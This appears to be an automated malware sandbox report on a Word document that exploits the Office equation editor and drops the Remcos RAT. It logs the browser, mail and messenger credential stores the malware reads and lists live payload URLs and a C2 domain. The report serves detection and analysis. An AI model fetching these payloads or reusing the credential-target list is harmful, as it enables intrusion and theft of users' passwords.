                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004489D7 GetSystemTimeAsFileTime,13_2_004489D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041B69E GetComputerNameExW,GetUserNameW,13_2_0041B69E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,13_2_00449210
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041739B GetVersionExW,16_2_0041739B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  Source: Yara match File source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 12.2.powershell.exe.3900b60.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 12.2.powershell.exe.3900b60.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0000000D.00000002.953027155.0000000000851000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: powershell.exe PID: 3952, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4076, type: MEMORYSTR
                  Source: Yara match File source: C:\Users\user\AppData\Local\Temp\notpad0\logs.dat, type: DROPPED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 13_2_0040BA4D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 13_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: \key3.db 13_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: ESMTPPassword 17_2_004033F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 17_2_00402DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 17_2_00402DB3
                  Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4076, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 2092, type: MEMORYSTR

                  Remote Access Functionality

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Mutex created: \Sessions\1\BaseNamedObjects\Rmc-EPF38I
Source: Yara match; File source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 12.2.powershell.exe.3900b60.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 12.2.powershell.exe.3900b60.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000D.00000002.953027155.0000000000851000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 3952, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RegAsm.exe PID: 4076, type: MEMORYSTR
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\notpad0\logs.dat, type: DROPPED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: cmd.exe, 13_2_0040569A
MITRE ATT&CK Matrix

The matrix is listed here by tactic (column); the number before a technique is the count shown in its matrix cell.

• Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
• Resource Development: 111 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
• Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
• Execution: 11 Native API; 43 Exploitation for Client Execution; 122 Command and Scripting Interpreter; 2 Service Execution; 3 PowerShell; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
• Persistence: 111 Scripting; 1 DLL Side-Loading; 1 Windows Service; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
• Privilege Escalation: 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Access Token Manipulation; 1 Windows Service; 422 Process Injection; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
• Defense Evasion: 11 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Masquerading; 21 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 422 Process Injection; HTML Smuggling; Dynamic API Resolution; Stripped Payloads
• Credential Access: 2 OS Credential Dumping; 211 Input Capture; 2 Credentials in Registry; 3 Credentials In Files; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
• Discovery: 2 System Time Discovery; 1 Account Discovery; 1 System Service Discovery; 4 File and Directory Discovery; 38 System Information Discovery; 3 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 4 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery; 1 Remote System Discovery
• Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
• Collection: 11 Archive Collected Data; 1 Data from Local System; 2 Email Collection; 211 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
• Command and Control: 15 Ingress Tool Transfer; 21 Encrypted Channel; 1 Non-Standard Port; 1 Remote Access Software; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
• Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
• Impact: 1 System Shutdown/Reboot; 1 Defacement; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
Behavior Graph (ID: 1522765; sample: AMG Cargo Logistic.docx; start date: 30/09/2024; architecture: WINDOWS; score: 100)

Start
• DNS/IP: og1.in
• Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 20 other signatures
• Process: WINWORD.EXE (308 48) started
  • DNS/IP: 91.134.96.177 (ports 49169, 49171, 49173), OVHFR, France
  • DNS/IP: og1.in 172.67.216.244 (ports 443, 49163, 49165), CLOUDFLARENETUS, United States
  • DNS/IP: 104.21.78.54 (ports 443, 49164, 49166), CLOUDFLARENETUS, United States
  • Dropped: C:\Users\user\...\uc on 91.134.96.177.url (MS)
  • Dropped: C:\Users\user\AppData\Roaming\...\S7UYq0.url (MS)
  • Dropped: ~WRF{6BDC8419-19FD...2-6E5B13CC56D9}.tmp (Composite)
  • Signatures: Microsoft Office launches external ms-search protocol handler (WebDAV); Office viewer loads remote template; Microsoft Office drops suspicious files
  • Process: EQNEDT32.EXE (12) started
    • Dropped: picturewithherimag...goodforyourhear.Vbs (Unicode)
    • Signatures: Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
    • Process: wscript.exe (1) started
      • Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Bypasses PowerShell execution policy; 2 other signatures
      • Process: powershell.exe (4) started
        • Signatures: Suspicious powershell command line found; Obfuscated command line found; Suspicious execution chain found
        • Process: powershell.exe (12 5) started
          • DNS/IP: raw.githubusercontent.com 185.199.109.133 (ports 443, 49172), FASTLYUS, Netherlands
          • Signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
          • Process: RegAsm.exe (3 13) started
            • DNS/IP: maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro 45.90.89.98 (ports 49174, 49175, 6845), CMCSUS, Bulgaria
            • DNS/IP: geoplugin.net 178.237.33.50 (ports 49176, 80), ATOM86-ASATOM86NL, Netherlands
            • Dropped: C:\Users\user\AppData\Local\Temp\...\logs.dat (data)
            • Signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Tries to steal Mail credentials (via file registry); 8 other signatures
            • Process: RegAsm.exe (1) started; signatures: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access); Searches for Windows Mail specific files
            • Process: RegAsm.exe started
            • Process: RegAsm.exe started; signatures: Tries to harvest and steal browser information (history, passwords, etc)
            • 9 other processes started

Source | Detection | Scanner | Label | Link
AMG Cargo Logistic.docx | 13% | ReversingLabs | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{6BDC8419-19FD-4A85-B752-6E5B13CC56D9}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
http://ocsp.entrust.net03 | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
http://geoplugin.net/json.gp | 0% | URL Reputation | safe |
http://crl.entrust.net/2048ca.crl0 | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
og1.in | 172.67.216.244 | true | true | | unknown
raw.githubusercontent.com | 185.199.109.133 | true | false | | unknown
geoplugin.net | 178.237.33.50 | true | false | | unknown
maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro | 45.90.89.98 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://og1.in/S7UYq0 | false | | unknown
http://91.134.96.177/80/WRRDFC.txt | true | | unknown
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt | false | | unknown
maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro | true | | unknown
